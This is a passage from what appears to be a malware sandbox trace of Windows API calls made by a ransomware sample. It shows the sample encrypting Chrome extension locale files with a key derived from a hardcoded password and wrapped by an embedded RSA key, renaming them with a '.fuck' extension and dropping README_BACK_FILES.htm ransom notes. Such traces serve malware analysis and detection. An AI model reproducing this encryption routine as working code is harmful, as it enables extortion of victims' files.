"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\readme_back_files.htm")) returned 0xffffffff [0254.215] AreFileApisANSI () returned 1 [0254.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.215] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.216] GetFileType (hFile=0x5d50) returned 0x1 [0254.216] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.217] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.217] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18468 [0254.218] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.218] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.218] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.218] GetLastError () returned 0x0 [0254.218] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json")) returned 0x20 [0254.218] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json", dwFileAttributes=0x80) returned 1 [0254.219] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.220] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.220] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.221] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e173f8) returned 1 [0254.223] CryptCreateHash (in: hProv=0x2e173f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.223] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.224] CryptHashData (hHash=0x2e18768, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.224] CryptDeriveKey (in: hProv=0x2e173f8, Algid=0x6610, hBaseData=0x2e18768, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e184e8) returned 1 [0254.224] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.224] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.224] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16738) returned 1 [0254.224] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16738, dwCertEncodingType=0x1, pInfo=0x298e260*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e290*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e298*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18728) returned 1 [0254.224] CryptEncrypt (in: hKey=0x2e18728, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.225] CryptEncrypt (in: hKey=0x2e18728, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e16d10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e16d10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.225] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e16d10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e16d10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.226] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xed, lpOverlapped=0x0) returned 1 [0254.227] CryptEncrypt (in: hKey=0x2e184e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xed, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0254.227] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0254.228] CloseHandle (hObject=0x5d60) returned 1 [0254.228] CloseHandle (hObject=0x5d5c) returned 1 [0254.228] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), bFailIfExists=0) returned 1 [0254.232] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json", dwFileAttributes=0x0) returned 1 [0254.232] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.gsg")) returned 1 [0254.233] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.fuck")) returned 1 [0254.235] CryptDestroyHash (hHash=0x2e18768) returned 1 [0254.235] CryptDestroyKey (hKey=0x2e184e8) returned 1 [0254.235] CryptReleaseContext (hProv=0x2e173f8, dwFlags=0x0) returned 1 [0254.235] FindNextFileA (in: hFindFile=0x2e18468, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.235] FindClose (in: hFindFile=0x2e18468 | out: hFindFile=0x2e18468) returned 1 [0254.235] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\readme_back_files.htm")) returned 0xffffffff [0254.235] AreFileApisANSI () returned 1 [0254.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.235] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.236] GetFileType (hFile=0x5d50) returned 0x1 [0254.236] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.238] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.238] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186e8 [0254.239] FindNextFileA (in: hFindFile=0x2e186e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.239] FindNextFileA (in: hFindFile=0x2e186e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.239] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.239] GetLastError () returned 0x0 [0254.239] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json")) returned 0x20 [0254.239] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json", dwFileAttributes=0x80) returned 1 [0254.240] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.241] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.242] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.243] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e16af0) returned 1 [0254.246] CryptCreateHash (in: hProv=0x2e16af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.246] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.246] CryptHashData (hHash=0x2e18328, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.246] CryptDeriveKey (in: hProv=0x2e16af0, Algid=0x6610, hBaseData=0x2e18328, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e186a8) returned 1 [0254.246] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.246] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.246] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e173f8) returned 1 [0254.247] CryptImportPublicKeyInfo (in: hCryptProv=0x2e173f8, dwCertEncodingType=0x1, pInfo=0x298f780*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f7b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f7b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18368) returned 1 [0254.247] CryptEncrypt (in: hKey=0x2e18368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.247] CryptEncrypt (in: hKey=0x2e18368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e169e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e169e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.247] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e169e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e169e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.248] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xa7, lpOverlapped=0x0) returned 1 [0254.249] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xa7, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0254.250] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0254.250] CloseHandle (hObject=0x5d5c) returned 1 [0254.250] CloseHandle (hObject=0x5d60) returned 1 [0254.250] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), bFailIfExists=0) returned 1 [0254.254] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json", dwFileAttributes=0x0) returned 1 [0254.255] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.gsg")) returned 1 [0254.256] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.fuck")) returned 1 [0254.258] CryptDestroyHash (hHash=0x2e18328) returned 1 [0254.258] CryptDestroyKey (hKey=0x2e186a8) returned 1 [0254.258] CryptReleaseContext (hProv=0x2e16af0, dwFlags=0x0) returned 1 [0254.258] FindNextFileA (in: hFindFile=0x2e186e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.258] FindClose (in: hFindFile=0x2e186e8 | out: hFindFile=0x2e186e8) returned 1 [0254.258] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\readme_back_files.htm")) returned 0xffffffff [0254.258] AreFileApisANSI () returned 1 [0254.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.258] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.259] GetFileType (hFile=0x5d50) returned 0x1 [0254.260] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.261] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.262] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180a8 [0254.262] FindNextFileA (in: hFindFile=0x2e180a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.262] FindNextFileA (in: hFindFile=0x2e180a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.262] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.262] GetLastError () returned 0x0 [0254.262] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json")) returned 0x20 [0254.263] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0254.263] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.264] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 